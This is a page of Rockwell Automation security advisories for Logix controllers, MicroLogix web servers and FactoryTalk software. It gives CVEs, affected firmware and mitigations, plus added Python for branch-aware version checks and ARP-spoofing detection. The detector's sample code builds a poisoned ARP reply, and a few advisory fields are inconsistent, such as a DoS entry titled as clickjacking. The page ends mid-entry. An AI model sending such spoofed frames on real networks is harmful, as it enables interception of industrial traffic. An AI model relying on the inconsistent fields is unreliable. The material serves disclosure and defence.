The connection establishment algorithm found in CompactLogix 5370 and ControlLogix 5570 does not sufficiently manage its control flow during execution, creating an infinite loop. This may allow an attacker to send specially crafted CIP™ packet requests to a controller, which may cause denial of service conditions in communications with other products.

CVSS v3.1 Base Score: 5.8/10 [MEDIUM]
CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:L

Risk Mitigation & User Action

Customers using the affected products are encouraged to update to an available firmware version that addresses the associated risk. Customers who are unable to update are directed towards risk mitigation strategies provided below and are encouraged, when possible, to combine these with the general security guidelines to employ multiple strategies simultaneously.

CVE-2020-6998
Products Affected | First Known Version Affected | Corrected In
CompactLogix 5370 | 20.011 | 33.011 and later
ControlLogix 5570 | 20.011 | 33.011 and later
GuardLogix 5570 | 20.011 | 33.011 and later
Compact GuardLogix 5370 | 28.011 | 33.011 and later
ControlLogix 5570 Redundancy | 20.054 | 33.051 and later

General Security Guidelines

Network-based Vulnerability Mitigations for Embedded Products
  • Consult the product documentation for specific features, such as a hardware mode switch setting, which may be used to block unauthorized changes.
  • Block all traffic to EtherNet/IP™ or other CIP™ protocol-based devices from outside the Manufacturing Zone by blocking or restricting access to TCP and UDP Port# 2222 and Port# 44818 using proper network infrastructure controls, such as firewalls, UTM devices, or other security appliances. For more information on TCP/UDP ports used by Rockwell Automation Products, see Knowledgebase Article BF7490 - TCP/UDP Ports Used by Rockwell Automation Products.

General Mitigations
  • Locate control system networks and devices behind firewalls and isolate them from the business network.
  • When remote access is required, use secure methods, such as Virtual Private Networks (VPNs), recognizing that VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize that VPN is only as secure as the connected devices.

For further information on the Vulnerability Handling Process for Rockwell Automation, please refer to our Product Security Incident Response FAQ document.

Refer to our Industrial Network Architectures Page for comprehensive information about implementing validated architectures designed to complement security solutions.

Refer to the Network Services Overview Page for information on network and security services for Rockwell Automation to enable assessment, design, implementation and management of validated, secure network architectures.

We also recommend that concerned customers continue to monitor this advisory by subscribing to updates on the Security Advisory Index for Rockwell Automation, located at: PN1354 - Industrial Security Advisory Index.

Rockwell Automation remains committed to making security enhancements to our systems in the future. For more information and for assistance with assessing the state of security of your existing control system, including improving your system-level security when using Rockwell Automation and other vendor controls products, you can visit the Rockwell Automation Security Solutions web site.

Requests for additional information can be sent to the RASecure Inbox (rasecure@ra.rockwell.com).



ADDITIONAL LINKS
  • PN1354 - Industrial Security Advisory Index
  • Industrial Firewalls within a CPwE Architecture
  • Deploying Industrial Firewalls within a CPwE Architecture Design and Implementation Guide
  • ICSA-21-061-02

Critical
PN1616 | CVE-2019-5096 and CVE-2019-5097 Vulnerabilities Impact Multiple Products
Published Date:
January 27, 2023
Last Updated:
September 08, 2025
CVE IDs:
CVE-2019-5097, CVE-2019-5096
Products:
1768/1769/5069 CompactLogix, 1769 Compact I/O, 1732E ArmorBlock I/O, 1756 ControlLogix, 1769 CompactLogix Controllers, 1747 SLC 500, 1756/1769/5069/2080 Chassis-based I/O, 1769 Compact GuardLogix 5370, 1756/5069 GuardLogix
CVSS Scores:
7.5, 9.8
Known Exploited Vulnerability (KEV):
No
Corrected:
No
Workaround:
No

Version
1.1
Revision History
Version 1.0 – January 27, 2023
Version 1.1 - September 8, 2025

Executive Summary

Rockwell Automation is aware of multiple products that use the GoAhead web server application that are affected by CVE-2019-5096 and CVE-2019-5097. These security issues could potentially have a high impact on the confidentiality, integrity and availability of the vulnerable devices. We have not received any notice of these security issues being used in Rockwell Automation products.

Customers using the affected products should use the mitigations provided below. Additional details relating to the discovered security issues, including impact and recommended countermeasures, are below.

Affected Products

CVE-2019-5096 and CVE-2019-5097

Catalog Number | Firmware Version
1732E-8CFGM8R/A | 1.012
1732E-IF4M12R/A (discontinued) | 1.012
1732E-IR4IM12R/A | 1.012
1732E-IT4IM12R/A | 1.012
1732E-OF4M12R/A | 1.012
1732E-OB8M8SR/A | 1.013
1732E-IB8M8SOER | 1.012
1732E-8IOLM12R | 2.011
1747-AENTR | 2.002
1769-AENTR | 1.001
5069-AEN2TR | 3.011
1756-EN2TR/C | <=11.001
1756-EN2T/D | <=11.001
1756-EN2TSC/B (discontinued) | 10.01
1756-EN2TSC/B | 10.01
1756-HIST1G/A (discontinued) | <=3.054
1756-HIST2G/A (discontinued) | <=3.054
1756-HIST2G/B | <=5.103

CVE-2019-5097 only

Catalog Number | Firmware Version
ControlLogix® 5580 controllers | V28 – V32*
GuardLogix® 5580 controllers | V31 – V32*
CompactLogix™ 5380 controllers | V28 – V32*
Compact GuardLogix 5380 controllers | V31 – V32*
CompactLogix 5480 controllers | V32*
1756-EN2T/D | 11.001*
1756-EN2TR/C | 11.001*
1756-EN3TR/B | 11.001*
1756-EN2F/C | 11.001*
1756-EN2TP/A | 11.001*

* The security issue is exploitable only via the Ethernet port; it is not exploitable via backplane or USB communications.

Security Issue Details

Rockwell Automation was made aware of two third-party security issues that affect the GoAhead embedded web server. A critical security issue (CVE-2019-5096) exists in the way requests are processed by the web server. A threat actor could exploit it to execute arbitrary code by sending specially crafted HTTP requests to the targeted device.

Additionally, a denial-of-service (DoS) vulnerability (CVE-2019-5097) exists in the GoAhead web server. To exploit it, a threat actor would send specially crafted HTTP requests that trigger an infinite loop in the web server process, after which the targeted device could crash.

CVE-2019-5096 EmbedThis GoAhead web server code execution vulnerability
CVSS Base Score: 9.8/10 (Critical)
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CVE-2019-5097 EmbedThis GoAhead web server denial-of-service vulnerability
CVSS Base Score: 7.5/10 (High)
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Risk Mitigation & User Action

Customers should apply the mitigations below.

Product | Suggested Actions
1732E-8CFGM8R/A | Refer to Additional Mitigations
1732E-IF4M12R/A | Refer to Additional Mitigations
1732E-IR4IM12R/A | Refer to Additional Mitigations
1732E-IT4IM12R/A | Refer to Additional Mitigations
1732E-OF4M12R/A | Refer to Additional Mitigations
1732E-OB8M8SR/A | Refer to Additional Mitigations
1732E-IB8M8SOER | Refer to Additional Mitigations
1732E-8IOLM12R | Refer to Additional Mitigations
1747-AENTR | Refer to Additional Mitigations
1769-AENTR | Update to 1.003 or later
5069-AEN2TR (discontinued) | Migrate to the 5069-AENTR
1756-EN2T/D | Update to 11.002 or later
1756-EN2TR/C | Update to 11.002 or later
1756-EN3TR/B | Update to 11.002 or later
1756-EN2F/C | Update to 11.002 or later
1756-EN2TP/A | Update to 11.002 or later
1756-EN2TSC/B | Refer to Additional Mitigations
1756-HIST1G/A (discontinued) | Update to series B v5.104 or series C v7.100 or later
1756-HIST2G/A (discontinued) | Update to series B v5.104 or series C v7.100 or later
1756-HIST2G/B | Update to 5.104 or later
ControlLogix 5580 controllers | Update to V32.016 or later
GuardLogix 5580 controllers | Update to V32.016 or later
CompactLogix 5380 controllers | Update to V32.016 or later
Compact GuardLogix 5380 controllers | Update to V32.016 or later
CompactLogix 5480 controllers | Update to V32.016 or later

Additional Mitigations

If updating firmware is not possible, customers should apply the following mitigations to help minimize risk.
  • Disable the web server, if possible. Review the product user manual for instructions, which can be found in the Rockwell Automation Literature Library.
    • For 1732E, upgrade to the latest firmware to disable the web server.
  • Configure firewalls to not allow network communication through HTTP/Port 80.
Please see our Knowledgebase article, QA43240 - Recommended Security Guidelines from Rockwell Automation, for more recommendations about maintaining your environment.

References

  • NVD - CVE-2019-5096 (nist.gov)
  • NVD - CVE-2019-5097 (nist.gov)

Glossary

Denial-of-Service: an attack that makes a device or service unavailable to legitimate users, either by flooding it with traffic or, as with CVE-2019-5097 above, by sending input that crashes or hangs it

HTTP Requests: (Hypertext Transfer Protocol) primarily used to fetch resources such as HTML documents, images, videos, and scripts. When a user requests a web page, the browser sends an HTTP request to the server, which then responds with the requested resource

High
PN1613 | PN1613 | Product Notice 1613: Logix Controllers Vulnerable to a Denial-of-Service Vulnerability
Published Date:
January 25, 2023
Last Updated:
September 08, 2025
CVE IDs:
CVE-2022-3157
Products:
1756-L71S, Standard Controllers, 1756-L72S, 1756-L73S, 1769 CompactLogix 5370
CVSS Scores:
8.6
Known Exploited Vulnerability (KEV):
No
Corrected:
No
Workaround:
No

Revision History
Revision Number
1.3
Revision History
Version 1.0 – December 15, 2022
Version 1.1 – January 17, 2023 – Updated risk mitigation section
Version 1.2 – January 25, 2023 – Updated risk mitigation section
Version 1.3 – September 8, 2025 – Updated for readability

Executive Summary

Rockwell Automation was made aware of a denial-of-service security issue that impacts several versions of our CompactLogix™, Compact GuardLogix, ControlLogix® and GuardLogix® controllers. Exploitation of this security issue could lead to a loss of availability of the controller and/or a major non-recoverable fault (MNRF).

Customers using affected software versions should use the mitigations in this disclosure. Additional details relating to the discovered security issue, including the products in scope, impact, and recommended countermeasures, are below. We have not received any notice of this security issue being used in Rockwell Automation products.

Affected Products

  • CompactLogix™ 5370
  • Compact GuardLogix 5370
  • ControlLogix 5570
  • ControlLogix 5570 redundancy
  • GuardLogix 5570

Security Issue Details

CVE-2022-3157 Controllers vulnerable to Denial-of-Service Condition
A security issue exists in the Rockwell Automation controllers listed above. It allows a malformed CIP™ request sent over the network to cause a major non-recoverable fault (MNRF) and a denial-of-service (DoS) condition.

CVSS Base Score:  8.6/10 (High)
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H

Risk Mitigation & User Action

This security issue has been addressed in newer versions of the products. Customers should apply the risk mitigations below and combine them with QA43240 - Recommended Security Guidelines from Rockwell Automation to employ multiple strategies simultaneously.

Products Affected | First Known Version Affected | Corrected In
CompactLogix 5370, ControlLogix 5570, GuardLogix 5570 | 20.011 | 33.013; 34.011 and later
Compact GuardLogix 5370 | 28.011 | 33.013; 34.011 and later
ControlLogix 5570 Redundancy | 20.054 | 33.052; 34.051 and later

Reference

  • CVE-2022-3157

Glossary

Denial-of-Service: an attack that makes a device or service unavailable to legitimate users, either by flooding it with traffic or, as with the malformed CIP request above, by sending input that faults or crashes it

Major Nonrecoverable Fault (MNRF): an error that occurs in a system or device and prevents it from recovering or functioning properly


High
PN1614 | PN1614 | Studio 5000 Logix Emulate Vulnerable to an SMB Misconfiguration Vulnerability
Published Date:
December 22, 2022
Last Updated:
December 22, 2022
CVE IDs:
CVE-2022-3156
Products:
RSLogix Emulate 5000 / Studio 5000 Logix Emulate
CVSS Scores:
7.8
Known Exploited Vulnerability (KEV):
No
Corrected:
No
Workaround:
No

Revision History
Revision Number
1.0
Revision History
Version 1.0 – December 22, 2022

Executive Summary

Rockwell Automation was made aware of a misconfiguration vulnerability that affects Studio 5000® Logix Emulate™. Exploitation of this vulnerability could potentially allow a malicious user to perform a remote code execution that could impact the confidentiality, integrity and availability of the software.

Customers using affected versions of this software are encouraged to evaluate the following mitigations and apply them where appropriate. Additional details relating to the discovered vulnerability, including the products in scope, impact and recommended countermeasures, are provided. We have not received any notice of this vulnerability being exploited in Rockwell Automation products.

Affected Products

Studio 5000 Logix Emulate v.20 – 33

Vulnerability Details

CVE-2022-3156 Studio 5000 Logix Emulate SMB misconfiguration vulnerability
Users are granted elevated permissions on select product services. Due to this misconfiguration, a malicious user could potentially achieve remote code execution on the targeted software. Note that the CVSS vector below is local (AV:L) with low privileges required (PR:L): the attacker must already hold a low-privileged account on the host running Logix Emulate, and the impact is escalation to arbitrary code execution on that host rather than an attack reachable from the network alone.

CVSS Base Score: 7.8/10 (High)
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Risk Mitigation & User Action

This vulnerability has been addressed in newer versions of the product. Customers are also directed towards the risk mitigations provided and are encouraged, when possible, to combine these with QA43240 - Recommended Security Guidelines from Rockwell Automation to employ multiple strategies simultaneously.

Vulnerability | Product | Suggested Actions
CVE-2022-3156 | Studio 5000 Logix Emulate | Upgrade to version 34.00 or later to mitigate this issue.

References

  • CVE-2022-3156
  • PN1354 - Industrial Security Advisory Index

High
PN1611 | MicroLogix 1100 and 1400 Product Web Server Application Vulnerable to Denial-Of-Service Condition Attack
Published Date:
December 13, 2022
Last Updated:
October 16, 2024
Products:
1763 MicroLogix 1100, 1766 MicroLogix 1400
CVSS Scores (v3.1):
7.5
Known Exploited Vulnerability (KEV):
No
Corrected:
No
Workaround:
Yes

Revision History
Revision Number
1.0
Revision History
Version 1.0 – December 13, 2022

Executive Summary

Rockwell Automation received a vulnerability report from security researchers at Veermata Jijabai Technological Institute (VJTI). If exploited, this vulnerability could cause a denial-of-service condition in the web server application on the targeted device.

Customers using affected versions of this software are encouraged to evaluate the mitigations provided below and apply them where appropriate. Additional details relating to the discovered vulnerability, including the products in scope, impact, and recommended countermeasures, are provided below. We have not received any notice of this vulnerability being exploited in Rockwell Automation products.

Affected Products

  • MicroLogix™ 1400 B/C v. 21.007 and below
  • MicroLogix™ 1400 A v. 7.000 and below
  • MicroLogix™ 1100 all versions

Vulnerability Details

Rockwell Automation was made aware that the web server of the MicroLogix 1400 Series B controller contains a vulnerability that may lead to a denial-of-service condition. An attacker with network access to the affected device could exploit it by sending TCP packets to the web server and closing the connection abruptly, which causes a denial-of-service condition for the web server application on the device.

CVE-2022-3166 MicroLogix Controllers Vulnerable to Clickjacking Attack
CVSS Base Score: 7.5/10 (High)
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Risk Mitigation & User Action

Customers using the affected products are encouraged to implement the risk mitigations below to minimize the risk of this vulnerability. Additionally, we encourage customers to combine the risk mitigations with security best practices to deploy a defense-in-depth strategy.
  • Disable the web server, if possible (this component is an optional feature and disabling it will not disrupt the intended use of the device).
  • Configure firewalls to disallow network communication through HTTP/Port 80.
  • Migrate to the Micro800 family (for example the Micro850), which does not have the web server component.
If applying the mitigations noted above is not possible, please see our Knowledgebase article QA43240 - Security Best Practices, for additional recommendations to maintain the security posture of your environment.

Additional Resources
  • CVE-2022-3166 JSON


High
PN1612 | MicroLogix 1100 and 1400 Web Server Application Vulnerable to Cross Site Scripting Attack
Published Date:
December 13, 2022
Last Updated:
October 16, 2024
Products:
1763 MicroLogix 1100, 1766 MicroLogix 1400
CVSS Scores (v3.1):
8.2
Known Exploited Vulnerability (KEV):
No
Corrected:
No
Workaround:
Yes

Revision History
Revision Number
1.0
Revision History
Version 1.0 – December 13, 2022

Executive Summary

Rockwell Automation received a vulnerability report from a security researcher at the Georgia Institute of Technology. If exploited, this vulnerability could allow an attacker to inject script into the page served by the web server application on the targeted device, which then runs in the browser of anyone who views that page.

Customers using affected versions of this software are encouraged to evaluate the mitigations provided below and apply them where appropriate. Additional details relating to the discovered vulnerability, including the products in scope, impact, and recommended countermeasures, are provided below. We have not received any notice of this vulnerability previously being exploited in Rockwell Automation products.

Affected Products

  • MicroLogix™ 1400 B/C v. 21.007 and below
  • MicroLogix™ 1400 A v. 7.000 and below
  • MicroLogix™ 1100 all versions

Vulnerability Details

Rockwell Automation was made aware that the MicroLogix 1100 and 1400 controllers contain a vulnerability that may give an attacker the ability to accomplish remote code execution. The vulnerability is an unauthenticated stored cross-site scripting vulnerability in the embedded web server: the payload is written to the controller over SNMP and is rendered, without escaping, on the homepage of the embedded website, so it executes in the browser of any user who views that page.

CVE-2022-46670 MicroLogix Controllers Vulnerable to Cross-Site Scripting Attack
CVSS Base Score: 8.2/10 (High)
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L

Risk Mitigation & User Action

Customers using the affected products are encouraged to implement the risk mitigations below to minimize the risk of this vulnerability. Additionally, we encourage customers to combine the risk mitigations with security best practices to deploy a defense-in-depth strategy.
  • Disable the web server, if possible (this component is an optional feature and disabling it will not disrupt the intended use of the device).
  • Configure firewalls to disallow network communication through HTTP/Port 80.
  • Because the payload reaches the controller over SNMP, also restrict SNMP (UDP/161) to trusted management hosts; blocking HTTP only stops the page from being viewed, not the write.
  • Migrate to the Micro800 family, which does not have the web server component.

If applying the mitigations noted above is not possible, please see our Knowledgebase article QA43240 - Security Best Practices, for additional recommendations to maintain the security posture of your environment.

Additional Resources
  • CVE-2022-46670 JSON


High
PN1609 | Logix Controllers Vulnerable to Denial-of-Service Attack
Published Date:
December 06, 2022
Last Updated:
October 16, 2024
CVE IDs:
CVE-2022-3752
Products:
1756-L83ES, Standard Controllers, 1756-L84ES, 1756-L81ES, 5069 CompactLogix, 1756-L82ES, 5069 Compact GuardLogix 5380
CVSS Scores (v3.1):
8.6
Known Exploited Vulnerability (KEV):
No
Corrected:
Yes
Workaround:
No

Revision History
Revision Number
1.0
Revision History
Version 1.0 – December 6, 2022

Executive Summary

Rockwell Automation discovered a vulnerability within our Logix controllers. This vulnerability may allow an unauthorized user to cause a denial of service on a targeted device. Customers using affected versions of this firmware are encouraged to evaluate the mitigations provided below and apply them to their deployed products. Additional details relating to the discovered vulnerability, including affected products and recommended countermeasures, are provided in this security advisory.

Affected Products

  • CompactLogix 5380 controllers
  • Compact GuardLogix® 5380 controllers
  • CompactLogix 5480 controllers
  • ControlLogix 5580 controllers
  • GuardLogix 5580 controllers

Vulnerability Details

CVE-2022-3752 Rockwell Automation Logix Controllers are Vulnerable to a Denial-of-Service Attack
An unauthorized user could send a specially crafted sequence of EtherNet/IP messages, combined with heavy traffic loading, to cause a denial-of-service condition resulting in a major non-recoverable fault (MNRF). If the target device faults, a user would have to clear the fault and re-download the user project file to bring the device back online and resume normal operation.

CVSS v3.1 Base Score: 8.6/10 (High)
CVSS v3.1 Vector: AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H

Risk Mitigation & User Action

Customers using the products in scope are encouraged to evaluate the mitigations provided below and apply the appropriate mitigations to their deployed products.
Products Affected | First Known Version Affected | Corrected In
CompactLogix 5380, Compact GuardLogix 5380, ControlLogix 5580, GuardLogix 5580 | 31.011 and later | 32.016 and later (v32 branch); 33.015 and later (v33 branch); 34.011 and later
CompactLogix 5480 | 32.011 and later | Same corrected versions as above

Customers should upgrade to one of the corrected versions listed above to mitigate this vulnerability.
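The tables above fix the bug on several firmware branches at once (32.016, 33.015, 34.011 "and later"), and the PN1613 table earlier on this page has branches (21 through 32) that never received a fix at all. A naive "version >= 32.016" comparison gets both cases wrong. The following is an added example, not Rockwell Automation code, of a branch-aware check that a vulnerability-management script can run against a firmware inventory; the only assumption is that a Logix revision is written MAJOR.MINOR with an optional leading "V" and that the minor compares as an integer.

```python
"""Branch-aware 'is this firmware affected?' check for Logix revisions.

Added example for this page; it is not Rockwell Automation code. The
ranges below are copied from the CVE-2022-3752 table above and from the
CVE-2022-3157 table (PN1613, above). Assumption: a Logix revision is
'MAJOR.MINOR' with an optional leading 'V', and the minor compares as an
integer (so 32.016 and 32.16 are the same revision)."""
from __future__ import annotations

from dataclasses import dataclass
from typing import Optional


@dataclass(frozen=True)
class FixMap:
    """First affected revision plus the first fixed revision on each branch."""
    first_affected: tuple[int, int]   # (31, 11) for "present in 31.011 and later"
    fixed_in: dict[int, int]          # major -> first fixed minor on that branch
    # "34.011 and later" also covers every newer major, so anything above the
    # highest branch listed is treated as fixed.

    @property
    def highest_branch(self) -> int:
        return max(self.fixed_in)


# PN1609: affected from 31.011; fixed in 32.016, 33.015 and 34.011.
CVE_2022_3752 = FixMap(first_affected=(31, 11), fixed_in={32: 16, 33: 15, 34: 11})
# PN1613 (CompactLogix 5370 / ControlLogix 5570 / GuardLogix 5570): affected
# from 20.011; fixed in 33.013 and 34.011; no fix exists on branches 21..32.
CVE_2022_3157 = FixMap(first_affected=(20, 11), fixed_in={33: 13, 34: 11})


def parse_rev(text: str) -> tuple[int, int]:
    """'V32.016' or '32.016' -> (32, 16); raises ValueError on anything else."""
    major, minor = text.strip().lstrip("Vv").split(".")
    return int(major), int(minor)


def is_affected(rev: str, fixes: FixMap) -> bool:
    major, minor = parse_rev(rev)
    if (major, minor) < fixes.first_affected:
        return False                      # predates the bug
    if major > fixes.highest_branch:
        return False                      # covered by "... and later"
    first_fixed_minor = fixes.fixed_in.get(major)
    if first_fixed_minor is None:
        return True                       # branch that never received a fix
    return minor < first_fixed_minor


def recommended_update(rev: str, fixes: FixMap) -> Optional[str]:
    """Lowest fixed revision reachable without going backwards, or None if not affected."""
    if not is_affected(rev, fixes):
        return None
    major, _ = parse_rev(rev)
    # Prefer the fix on the current branch; otherwise the lowest fixed branch above it.
    target = min(m for m in fixes.fixed_in if m >= major)
    return f"{target}.{fixes.fixed_in[target]:03d}"


if __name__ == "__main__":
    for rev in ("V31.011", "V32.011", "V32.016", "V33.014", "V35.011"):
        state = "affected" if is_affected(rev, CVE_2022_3752) else "not affected"
        print(rev, state, recommended_update(rev, CVE_2022_3752))
```

The shape of the data matters more than the code: keep one FixMap per advisory and per product group, since the same CVE can have different first-affected and corrected-in values for different hardware (compare the ControlLogix 5570 Redundancy row in PN1613 with the non-redundant row).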

General Security Guidelines

General security guidelines can be found in QA43240 - Recommended Security Guidelines Article in our Knowledgebase.

Requests for additional information can be sent to the PSIRT Inbox (PSIRT@rockwellautomation.com).

ADDITIONAL LINKS

  • PN1354 - Industrial Security Advisory Index
  • CVE-2022-3752 JSON


Medium
PN1608 | FactoryTalk Live Data Communication Module Vulnerable to Man-In-The-Middle Attack
Published Date:
December 01, 2022
Last Updated:
October 16, 2024
Products:
LiveData
CVSS Scores (v3.1):
5.9
Known Exploited Vulnerability (KEV):
No
Corrected:
No
Workaround:
Yes

Revision History
Revision Number
1.0
Revision History
Version 1.0 – December 1, 2022

Executive Summary

Rockwell Automation received a report from Guidepoint Security regarding a security vulnerability discovered within the FactoryTalk® Live Data Communication Module contained within the FactoryTalk Services Platform. Because this module uses a cleartext protocol, a malicious actor on the same network segment could use Address Resolution Protocol (ARP) spoofing to route the traffic through their own host, resulting in a loss of integrity. The attacker could then read and modify packets in transit and potentially deceive the operator into seeing false data on the human machine interface.

Customers using affected versions of this software are encouraged to evaluate the mitigations provided below and apply the appropriate mitigations to their deployed products. Additional details relating to the issue, including affected products and recommended countermeasures, are provided.

Affected Products

FactoryTalk LiveData Communication Module (Contained within FactoryTalk Services Platform) - All versions

Vulnerability Details

FactoryTalk LiveData Communication Module vulnerable to man-in-the-middle attack
An unauthenticated attacker with network access can carry out a man-in-the-middle attack against the cleartext protocol of the FactoryTalk LiveData Communication Module and modify traffic, leading to a complete loss of integrity for the affected products. As a result, the operator at the human machine interface could see manipulated data on the screen.

CVSS v3.1 Base Score: 5.9/10 (Medium)
CVSS v3.1 Vector: AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:H/A:N
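The attack described above starts with ARP spoofing: the attacker sends ARP replies that bind the HMI's or data server's IP address to the attacker's own MAC address, so the cleartext LiveData traffic is switched through the attacker's host. The following is an added example, not Rockwell Automation code, of the detection side of that: it parses raw Ethernet II + ARP frames and raises an alert when an IP address that was learned or pinned to one MAC is suddenly claimed by another, or when the Ethernet source address disagrees with the ARP sender address. It does not speak the LiveData protocol; all MAC and IP values are made up and the frames are constructed inline rather than captured.

```python
"""Detect ARP-cache poisoning of the kind the advisory above describes.

Added example for this page; it is not Rockwell Automation code and it
does not speak the FactoryTalk LiveData protocol. It parses raw Ethernet
II + ARP frames and flags (a) an IP address whose sender MAC changes from
what was learned or pinned and (b) a frame whose Ethernet source MAC
disagrees with the ARP sender MAC. All MAC/IP values are made up."""
import struct
from typing import Optional

ETH_P_ARP = 0x0806
ARP_REQUEST, ARP_REPLY = 1, 2


def mac_bytes(text: str) -> bytes:
    return bytes.fromhex(text.replace(":", ""))


def mac_str(raw: bytes) -> str:
    return ":".join(f"{b:02x}" for b in raw)


def ip_bytes(text: str) -> bytes:
    return bytes(int(octet) for octet in text.split("."))


def ip_str(raw: bytes) -> str:
    return ".".join(str(b) for b in raw)


def build_arp_reply(sender_mac: str, sender_ip: str, target_mac: str, target_ip: str) -> bytes:
    """Ethernet II header + 28-byte ARP reply (42 bytes), as a NIC would emit it.
    Used here only to construct sample traffic."""
    eth = mac_bytes(target_mac) + mac_bytes(sender_mac) + struct.pack("!H", ETH_P_ARP)
    arp = struct.pack("!HHBBH", 1, 0x0800, 6, 4, ARP_REPLY)  # Ethernet, IPv4, hlen, plen, opcode
    arp += mac_bytes(sender_mac) + ip_bytes(sender_ip)
    arp += mac_bytes(target_mac) + ip_bytes(target_ip)
    return eth + arp


def parse_arp(frame: bytes):
    """Return (opcode, eth_src_mac, arp_sender_mac, arp_sender_ip), or None if the
    frame is not IPv4-over-Ethernet ARP."""
    if len(frame) < 42 or struct.unpack("!H", frame[12:14])[0] != ETH_P_ARP:
        return None
    htype, ptype, hlen, plen, op = struct.unpack("!HHBBH", frame[14:22])
    if (htype, ptype, hlen, plen) != (1, 0x0800, 6, 4):
        return None
    return op, mac_str(frame[6:12]), mac_str(frame[22:28]), ip_str(frame[28:32])


class ArpWatch:
    """IP -> MAC bindings learned from replies. Pin the HMI and server bindings up
    front so the very first poisoned reply is caught instead of being 'learned'."""

    def __init__(self, pinned: Optional[dict] = None):
        self.bindings = dict(pinned or {})

    def observe(self, frame: bytes) -> Optional[str]:
        parsed = parse_arp(frame)
        if parsed is None:
            return None
        op, eth_src, sender_mac, sender_ip = parsed
        if eth_src != sender_mac:
            return f"ARP sender {sender_mac} for {sender_ip} does not match frame source {eth_src}"
        if op != ARP_REPLY:
            return None
        known = self.bindings.get(sender_ip)
        if known is None:
            self.bindings[sender_ip] = sender_mac   # first sighting: learn it
            return None
        if known != sender_mac:
            # The pinned/learned binding stays authoritative; do not overwrite it.
            return f"ARP conflict: {sender_ip} is {known} but {sender_mac} now claims it"
        return None


def scan(frames, pinned=None):
    """Run all frames through one watcher and return the alerts in order."""
    watch = ArpWatch(pinned)
    return [alert for alert in (watch.observe(f) for f in frames) if alert]


if __name__ == "__main__":
    HMI, SERVER, ATTACKER = "02:00:00:00:00:10", "02:00:00:00:00:20", "02:00:00:00:00:66"
    traffic = [
        build_arp_reply(SERVER, "192.168.1.20", HMI, "192.168.1.10"),    # legitimate reply
        build_arp_reply(ATTACKER, "192.168.1.20", HMI, "192.168.1.10"),  # poisons the HMI's cache
    ]
    for alert in scan(traffic):
        print(alert)
```

On a real network the frames would come from a span port or a raw socket on a sensor host. The pinned table is the important part for an HMI/server pair: without it, an attacker who is already spoofing when the sensor starts is simply "learned" as the truth, which is why arpwatch-style tools are usually seeded with the known bindings of the few hosts that matter.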

Risk Mitigation & User Action

Customers using the affected software are encouraged to set up the secondary mitigation described below, which addresses the associated risk. Customers are also directed towards the general risk mitigation strategies provided in QA43240 - Recommended Security Guidelines from Rockwell Automation in our Knowledgebase.

Suggested Actions

Customers should set up IPsec to mitigate this issue as detailed in the QA46277 - Deploying FactoryTalk Software with IPsec Knowledgebase article.

General Security Guidelines

If customers are unable to implement IPsec, it is recommended that the guidelines below be adhered to, as they provide strong mitigations against this type of attack. Note that ARP spoofing only works from a host on the same Layer 2 segment as the HMI or data server, so segmentation limits who can get into that position; it does not itself protect the cleartext traffic, which is what IPsec does.

Network-based Vulnerability Mitigations for Embedded Products
  • Utilize proper network infrastructure controls to help ensure that unused or unnecessary protocols from unauthorized sources are blocked. For more information on TCP/UDP ports and protocols used by Rockwell Automation products, see Knowledgebase Article BF7490 - TCP/UDP Ports Used by Rockwell Automation Products.
  • Locate control system networks and devices behind firewalls and isolate them from the business network.
  • Consult the product documentation for specific features, (e.g. hardware keyswitch settings) which may be used to block unauthorized changes, etc.
  • Block all traffic to EtherNet/IP or other CIP protocol-based devices from outside the Manufacturing Zone by blocking or restricting access to TCP and UDP Port# 2222 and Port# 44818 using proper network infrastructure controls, such as firewalls, UTM devices, or other security appliances.

General security guidelines can be found in the QA43240 - Recommended Security Guidelines from Rockwell Automation in our Knowledgebase.

Requests for additional information can be sent to the PSIRT Inbox (PSIRT@rockwellautomation.com).

Additional Links

  • PN1354 - Industrial Security Advisory Index


Critical
PN1576 | PN1576 | FactoryTalk® Activation Manager and Studio 5000 Logix Designer® contain Wibu Codemeter vulnerabilities.
Published Date:
November 17, 2022
Last Updated:
November 17, 2022
CVE IDs:
CVE-2021-20094, CVE-2021-20093, CVE-2021-41057
Products:
FactoryTalk Activation, RSLogix 5000 / Studio 5000 Logix Designer
CVSS Scores:
7.5, 9.1
Known Exploited Vulnerability (KEV):
No
Corrected:
No
Workaround:
No

Revision History
Revision Number
3.0
Revision History
Version 1.0 – August 6, 2021
Version 2.0 – August 11, 2021 – Removed modified score
Version 3.0 – November 22, 2022

Executive Summary

Rockwell Automation is impacted by advisory ICSA-21-210-02, which covers two vulnerabilities in the Wibu-Systems AG CodeMeter Runtime; a third CodeMeter vulnerability, CVE-2021-41057, was added to this advisory in the November 2022 update. These vulnerabilities affect FactoryTalk® Activation Manager and Studio 5000 Logix Designer®. If successfully exploited, they may allow the reading of data from the heap of the CodeMeter Runtime network server or result in a crash of the CodeMeter Runtime Server (i.e., CodeMeter.exe).

Customers using affected versions of this software are encouraged to evaluate the mitigations provided below and apply the appropriate mitigations to their deployed products. Additional details relating to the discovered vulnerability, including affected products and recommended countermeasures, are provided herein.

Affected Products

  • FactoryTalk® Activation Manager v4.00 to v4.05.02
    • Includes Wibu-Systems AG CodeMeter v7.20a and earlier
  • Studio 5000 Logix Designer® v23.00.01 to v33.00.02

Vulnerability Details

CVE-2021-20093: CWE-126

FactoryTalk Activation Manager and Studio 5000 Logix Designer: An issue exists in the Wibu-Systems AG CodeMeter Runtime that allows a remote, unauthenticated attacker to send a specially crafted packet, which could result in crashing the server or direct the CodeMeter Runtime Network Server to send back packets containing data from the heap.


Wibu-Systems AG score:

CVSS v3.1 Base Score: 9.1/10 (Critical)
CVSS v3.1 Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H

CVE-2021-20094: CWE-126

